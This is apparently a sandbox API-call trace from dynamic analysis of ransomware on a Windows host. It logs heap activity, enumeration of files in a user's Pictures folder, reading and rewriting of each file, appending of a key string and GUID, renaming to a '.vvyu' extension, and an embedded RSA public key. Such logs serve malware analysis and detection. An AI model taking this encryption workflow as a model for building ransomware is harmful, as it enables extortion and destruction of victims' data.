[0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0193.233] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0193.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0193.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.233] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0193.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39e80 [0193.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0193.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0193.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.236] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0193.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0193.237] GetCurrentThreadId () returned 0x264 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d459d0 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0193.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0193.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.238] GetCurrentThreadId () returned 0x264 [0193.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2c31700 [0193.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0193.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0193.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0193.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ee0 [0193.240] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0193.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e80 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e98 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39e68 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0193.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ef8 [0193.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39ec8 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39eb0 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f10 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39eb0 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ec8 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39e80 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ee0 | out: hHeap=0x6a0000) returned 1 [0193.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e80 | out: hHeap=0x6a0000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.245] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39eb0 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39ef8 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e98 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e68 | out: hHeap=0x6a0000) returned 1 [0193.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0193.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39e50 | out: hHeap=0x6a0000) returned 1 [0193.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41f08 | out: hHeap=0x6a0000) returned 1 [0193.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.250] WriteFile (in: hFile=0x584, lpBuffer=0x2d47778*, nNumberOfBytesToWrite=0xe742, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d47778*, lpNumberOfBytesWritten=0x30ffb14*=0xe742, lpOverlapped=0x0) returned 1 [0193.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.251] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe747, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.251] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.252] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.253] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.253] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.253] CloseHandle (hObject=0x584) returned 1 [0193.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0193.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d47778 [0193.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0193.255] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\exU6-Q0h.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\exu6-q0h.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\exU6-Q0h.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\exu6-q0h.jpg.vvyu")) returned 1 [0193.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47778 | out: hHeap=0x6a0000) returned 1 [0193.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.257] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0193.260] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe7e97c00, ftCreationTime.dwHighDateTime=0x1d8a3bb, ftLastAccessTime.dwLowDateTime=0xe86d4c80, ftLastAccessTime.dwHighDateTime=0x1d8a530, ftLastWriteTime.dwLowDateTime=0xe86d4c80, ftLastWriteTime.dwHighDateTime=0x1d8a530, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k4vLze9TyD", cAlternateFileName="K4VLZE~1")) returned 1 [0193.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0193.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x6f4d00 [0193.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47790 [0193.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6f4d00 | out: hHeap=0x6a0000) returned 1 [0193.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0193.261] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe97d0e20, ftCreationTime.dwHighDateTime=0x1d8a167, ftLastAccessTime.dwLowDateTime=0x232660f0, ftLastAccessTime.dwHighDateTime=0x1d8a4a0, ftLastWriteTime.dwLowDateTime=0x232660f0, ftLastWriteTime.dwHighDateTime=0x1d8a4a0, nFileSizeHigh=0x0, nFileSizeLow=0x993d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lbmw DOKXEH2om_f.gif", cAlternateFileName="LBMWDO~1.GIF")) returned 1 [0193.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0193.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.261] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\lbmw DOKXEH2om_f.gif") returned=".gif" [0193.261] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\d7pQIdSiE6laiAyeoE\\lbmw DOKXEH2om_f.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\d7pqidsie6laiayeoe\\lbmw dokxeh2om_f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0193.262] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=39229) returned 1 [0193.262] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0193.265] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9917, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.265] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0193.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0193.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.267] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.267] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x993d, lpOverlapped=0x0) returned 1 [0193.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.268] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0193.268] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.268] lstrlenA (lpString="-----BEGIN PUBLIC 